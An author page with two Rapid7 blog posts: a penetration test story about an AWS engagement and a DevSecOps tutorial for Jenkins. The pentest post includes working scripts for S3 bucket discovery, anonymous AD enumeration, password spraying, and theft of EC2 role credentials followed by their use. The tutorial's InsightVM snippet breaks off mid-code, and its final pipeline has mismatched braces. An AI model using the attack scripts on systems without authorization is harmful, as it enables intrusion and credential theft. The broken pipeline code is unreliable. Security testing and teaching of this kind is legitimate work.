All posts by Arvind Vishwakarma

PenTales: There Are Many Ways to Infiltrate the Cloud

Post Syndicated from Arvind Vishwakarma original https://blog.rapid7.com/2023/07/27/pentales-there-are-many-ways-to-infiltrate-the-cloud/

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customers' security that can only come from actively trying to break it! In this series, we're going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization's security.

Rapid7 was engaged to do an AWS cloud ecosystem pentest for a large insurance group. The test covered internal and external assets, the AWS cloud platform itself, and a configuration scan of their AWS infrastructure to uncover gaps against NIST's best practices guide.

I evaluated their external assets, but most of the IPs were configured to block unauthorized access. I continued testing but did not gain access to any of the external assets; with the cloud, once access has been blocked at the platform itself, there is not a lot an attacker can do about it. Nevertheless, I continued to probe for cloud resources, namely S3 buckets, AWS apps, and so on, using company-based keywords, for example: companyx, companyx.IT, companyx.media. Eventually, I found S3 buckets that were publicly accessible on their external network. These buckets contained sensitive information, which was definitely a point of action for the client.
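
This kind of keyword-based discovery is easy to script. Below is a minimal sketch of the idea; the keyword list is hypothetical, and it relies on S3's documented behavior of returning 404 for nonexistent buckets and 403 for buckets that exist but deny anonymous listing.

import requests

# Hypothetical keyword list built from the target company's name.
KEYWORDS = ["companyx", "companyx-it", "companyx-media", "companyx-backups"]

def check_bucket(name):
    """Probe an S3 bucket by name. S3 returns 404 for nonexistent buckets,
    403 for buckets that exist but deny anonymous listing, and 200 when
    anonymous listing is allowed."""
    resp = requests.get(f"https://{name}.s3.amazonaws.com/", timeout=5)
    if resp.status_code == 404:
        return "does not exist"
    if resp.status_code == 403:
        return "exists (listing denied)"
    if resp.status_code == 200:
        return "exists and is publicly listable!"
    return f"unexpected status {resp.status_code}"

for name in KEYWORDS:
    print(f"{name}: {check_bucket(name)}")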

My next step was a configuration scan of their AWS network, which provided complete visibility into their cloud infrastructure: the resources that were running, the roles attached to those resources, the open services, and so on. It also gave the customer valuable insight into the security controls that were missing per NIST's best practices guide, such as unused access keys, unencrypted disk volumes, keys not rotated every 90 days, insufficient logging, and publicly accessible services like SSH and RDP. This scan was done using Rapid7's very own InsightCloudSec tool, which gives customers visibility into their cloud network and helps them identify gaps.

When testing the AWS cloud platform with the read-only credentials provided by the customer, I found the credentials were locked down with a strong IAM policy that only allowed viewing cloud resources on the platform. My attempts to enumerate vulnerabilities turned up no weaknesses in the IAM policy itself. This will be important later on!

I found hardcoded credentials in Function Apps and EC2 instance data but was unable to use them to escalate privileges. Enumerating the S3 buckets with the read-only credentials turned up multiple buckets containing customer invoices and payment data, along with infrastructure-as-code files that revealed how the customer managed their automated deployments. Beyond this, I was unable to find any vulnerabilities to escalate privileges; however, I kept all the data gathered during this phase handy in case there was a chance to chain vulnerabilities together and gain access during the later phases of the pentest. Although it was frustrating not to find a way to escalate privileges from the platform itself, enumerating it gave me plenty of understanding of the environment, which would prove useful in the next phase.

In the final phase of the test, I tested all of the internal assets that were in scope. These were primarily Windows servers on EC2 instances hosting different kinds of services and applications. I enumerated the Active Directory domain controllers on these servers and found that some AD servers allowed NULL session enumeration, which means you could connect to the AD server and dump out all of the domain information, like users, groups, and password policies, without authentication.
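
One common form of this is an anonymous LDAP bind. Here is a minimal sketch using Python's ldap3 library, with a hypothetical domain controller hostname and base DN:

from ldap3 import Server, Connection, ALL

# Hypothetical domain controller and base DN.
server = Server("dc01.corp.local", get_info=ALL)

# auto_bind with no credentials attempts an anonymous (NULL session) bind.
conn = Connection(server, auto_bind=True)

# If anonymous reads are allowed, this dumps account names without auth.
conn.search(
    search_base="dc=corp,dc=local",
    search_filter="(objectClass=user)",
    attributes=["sAMAccountName"],
)
for entry in conn.entries:
    print(entry.sAMAccountName)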

With all the users from the domain in hand, I deployed password spray attacks. Pretty quickly, it was clear there were multiple users using weak passwords like Summer2023, Winter23, or Password1. Many accounts were even sharing the same passwords! This provided plenty of compromised credentials, allowing me to work through the access levels granted to these compromised accounts. I found one account with Domain Admin access and dumped the NTDS.dit file from the AD servers, which contains the hashes for all the domain users. With this, I cracked several more accounts with weak passwords.
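
A password spray tries one password across many accounts to stay under lockout thresholds. A minimal sketch using the impacket library (the hostname, domain, and user list file are hypothetical):

from impacket.smbconnection import SMBConnection

# Hypothetical targets: users dumped via the null session, one seasonal password.
DC, DOMAIN, PASSWORD = "dc01.corp.local", "CORP", "Summer2023"

for user in open("domain_users.txt"):
    user = user.strip()
    try:
        conn = SMBConnection(DC, DC)
        conn.login(user, PASSWORD, DOMAIN)
        print(f"[+] valid: {DOMAIN}\\{user}:{PASSWORD}")
        conn.logoff()
    except Exception:
        pass  # failed attempt; in practice, throttle to respect the lockout policy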

With access to multiple accounts in the bag, the only goal left was to gain some sort of access to the AWS platform. Using the data gathered during the AWS cloud platform test, I first looked at the EC2 instances on the platform and the roles assigned to each of them, then assessed which compromised accounts had admin access. I found an 'xx-main-ec2-prod' role attached to an EC2 instance that I could administer through one of the compromised accounts. After logging in to the EC2 instance over RDP, I queried the instance metadata service and retrieved the temporary AWS credentials for the 'xx-main-ec2-prod' role.
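
From inside an EC2 instance, those temporary role credentials come from the instance metadata service at 169.254.169.254. A minimal sketch of the retrieval (IMDSv1 shown for brevity):

import requests

IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials"

# The first request returns the name of the role attached to the instance.
role = requests.get(IMDS, timeout=2).text.strip()

# The second returns JSON containing AccessKeyId, SecretAccessKey, and Token.
creds = requests.get(f"{IMDS}/{role}", timeout=2).json()

print(role)
print(creds["AccessKeyId"])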

With these credentials, I created a new AWS profile and enumerated the permissions associated with the role. The 'xx-main-ec2-prod' role could list secrets in the AWS account, put and delete objects in all S3 buckets, send OS commands to all EC2 instances in the account, and modify logs as well. I proceeded to list some secrets in the AWS account to confirm the access we had gained. With this level of access, I was able to show the client how an attacker could escalate privileges on their AWS platform.
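
Turning stolen temporary credentials into an authenticated session is straightforward with boto3; a sketch under assumptions (placeholder credential values standing in for the metadata response, and an assumed region):

import boto3

# Temporary role credentials, e.g. the JSON retrieved from the instance
# metadata service in the previous sketch (placeholder values shown).
creds = {
    "AccessKeyId": "ASIA...",
    "SecretAccessKey": "...",
    "Token": "...",
}

session = boto3.session.Session(
    aws_access_key_id=creds["AccessKeyId"],
    aws_secret_access_key=creds["SecretAccessKey"],
    aws_session_token=creds["Token"],
    region_name="us-east-1",  # assumed region
)

# Confirm the role's access by listing secret names (not values).
for secret in session.client("secretsmanager").list_secrets()["SecretList"]:
    print(secret["Name"])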

In the end, this testing highlights how vast the attack surface of a cloud network can be. Even if you've locked down your cloud platform, the infrastructure assets may still be vulnerable, allowing attackers to compromise them and then move laterally into the cloud network. As organizations move their networks to the cloud, it is important not to simply depend on the cloud platform to secure the network, but also to ensure their individual assets are continuously tested and secured.

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

3 Steps to Integrate Rapid7 Products Into the DevSecOps Cycle

Post Syndicated from Arvind Vishwakarma original https://blog.rapid7.com/2021/08/02/3-steps-to-integrate-rapid7-products-into-the-devsecops-cycle/

DevSecOps is the concept and practice of integrating security into the DevOps cycle. The idea is to bring the different phases of security into the DevOps model and try to automate the entire process, so security is integrated directly into the initial application builds.

In this post, we'll take a closer look at how to integrate security tools into the various phases of the DevSecOps cycle. We'll focus here on Rapid7 tools like InsightVM, InsightAppSec, and InsightOps; the same principles apply when integrating open-source security tools into the process.

In this simple, three-step setup, we'll use GitLab as the version control system and Jenkins as the build automation server. (Before getting started, you'll need to have the integration between GitLab and Jenkins completed.)

We’ll be using a simple declarative script in our pipeline, as follows:

pipeline {
    agent any

    stages {
        stage("build") {
            steps {
                echo "This is a build step"
            }
        }
        stage("test") {
            steps {
                echo "This is a test step"
            }
        }
        stage("release") {
            steps {
                echo "This is an integration step"
                sh "exit 1"
            }
        }
    }
}

Step 1: Integrate InsightAppSec

First, we’ll include the InsightAppSec Scan in the pipeline. Ideally, this would be in the DAST stage.

To get started, we'll install the InsightAppSec plugin. We'll need a few more details on hand, like the scan configuration ID and the Insight API key, which you can fetch from the InsightAppSec platform. We can then set up the scan on the InsightAppSec platform or use the InsightAppSec APIs to create a scan. Once we have the required details, we can kick-start the scan in our pipeline.

Here, we've used a Python script to add an app and create a scan configuration on the InsightAppSec platform.
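
A minimal sketch of such a script, assuming the InsightAppSec REST API v1 (the base URL, API key, and attack template ID are placeholders you'd replace with your own values):

import requests

# Placeholder values: use your region's base URL and your own Insight API key.
BASE_URL = "https://us.api.insight.rapid7.com/ias/v1"
HEADERS = {"X-Api-Key": "YOUR-INSIGHT-API-KEY"}

# Create the app on the InsightAppSec platform; the new app's ID comes back
# in the Location header of the 201 response.
resp = requests.post(f"{BASE_URL}/apps", headers=HEADERS, json={"name": "HackMe"})
app_id = resp.headers["Location"].rsplit("/", 1)[-1]

# Create a scan configuration tied to the app (attack template ID is a placeholder).
requests.post(
    f"{BASE_URL}/scan-configs",
    headers=HEADERS,
    json={
        "name": "HackMe-baseline",
        "app": {"id": app_id},
        "attack_template": {"id": "YOUR-ATTACK-TEMPLATE-ID"},
    },
)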

Now, with the App Name and Scan Configuration ID, we can set up the scan in the pipeline with the following code:

stage("dast-InsightAppSec") {
    steps {
        catchError(buildResult: 'SUCCESS', stageResult: 'UNSTABLE') {
            insightAppSec region: 'US',
                insightCredentialsId: 'Insightappsec-api',
                scanConfigId: '9d31d36a-f590-4129-aba3-9212fe67fa8e',
                buildAdvanceIndicator: 'SCAN_COMPLETED',
                vulnerabilityQuery: 'vulnerability.severity=\'HIGH\'',
                maxScanPendingDuration: '0d 0h 10m',
                maxScanExecutionDuration: '0d 1h 0m',
                appId: 'HackMe',
                enableScanResults: true
        }
    }
}

We've already filled in the "scanConfigId" and "appId" details; we just need to replace the "insightCredentialsId" with the Jenkins credentials ID that stores the InsightAppSec API key. Setting the "enableScanResults" option to "true" will show results of the scan as a new option on the Jenkins build page, with the label InsightAppSec Scan Results.

Step 2: Integrate the InsightVM Container Scanner

Next, we’ll integrate the InsightVM Container Scanner in the pipeline. In this step, we’ll build our Docker Image and scan it using InsightVM Container Scanner before pushing it into our registry to host apps in our staging or production environment.

To get started, we first have to install the InsightVM Container Scanner plugin on our Jenkins Server.

We’ll be building our Docker container using a Dockerfile, which we have to add to our Gitlab repository. After building the Docker container, we’ll scan it using the InsightVM Scanner.

We can set up the InsightVM Scanner in our pipeline with the following code:

stage("InsightVM Scan"){
            environment {
                dockerUrl = "https://registry.hub.docker.com"
                dockerCreds = "registry-auth" 
            }
            steps {
                script {
                    catchError(buildResult: 'SUCCESS', stageResult: 'UNSTABLE') {
                        dockerImage = docker.build('user/repo:$BUILD_NUMBER')
		echo "Built image ${dockerImage.id}"
		assessContainerImage failOnPluginError: true,
           	                	imageId: "${dockerImage.id}",
           		            		thresholdRules: [
                                    

The results of the scan should appear as a new option on the build page, with the label Rapid7 Assessment. The results are also available on the Builds tab of the Containers option within the InsightVM platform.

Step 3: Integrate InsightOps

In the final step, we’ll integrate InsightOps, Rapid7’s log management solution, into the pipeline. This integration will forward all the logs to the InsightOps platform.

To get started, we have to install the Logstash plugin on our Jenkins server. Then, to set up InsightOps, we’ll have to configure a collection source on our InsightOps platform.

Simply log into the InsightOps platform, then click Add Data and select Webhook (you'll find this option under System data). Then, name the log set Jenkins-Console and copy the URL for the log entries.
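
To sanity-check the collection source before wiring up Jenkins, you can POST a test entry to that URL. A minimal sketch, where the URL is simply whatever you copied from the InsightOps webhook source:

import requests

# Placeholder: the log-entries URL copied from the InsightOps webhook source.
WEBHOOK_URL = "<log-entries URL copied from InsightOps>"

# Send a single test entry; it should appear in the Jenkins-Console log set.
requests.post(WEBHOOK_URL, data="jenkins-console webhook test entry")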

On the Jenkins server, head to the Configuration page and scroll down to the Logstash option. Click on "Enable sending logs to an Indexer," and select the Indexer type as Elastic Search. Finally, paste the log-entries URL that was copied from InsightOps. Remember to append the Insight API key to the URL.

To send the logs, we can either select the Enable Globally option or add the Logstash option to the pipeline, as shown in the following code:

pipeline {
    agent any
 
    stages {
        stage("build") {
            steps {
                echo "This is a build step"
            }
        }
        stage("test") {
            steps {
                echo "This is a test step"
            }
        }
        stage("release") {
            steps {
                    echo "This is an integration step"
                    sh "exit 1"
                }
            }
        }
        stage("deploy") {
            steps {
                input "Deploy to production?"
                echo "This is a deploy step."
            }
        }
    }
}

After editing the pipeline, we can run the build again and view the log data on our InsightOps dashboard.

Lastly, we’ve embedded some other open-source tools to complete our DevSecOps pipeline. The final pipeline looks something like this:

[Screenshot: the final DevSecOps pipeline with all integrated stages]

This three-step process is an intuitive way to integrate Rapid7 products into a DevSecOps pipeline, but it’s just one way to approach the task. Because our products support APIs, you can set up the integration according to your environment, so you have the flexibility to build the DevSecOps pipeline you need.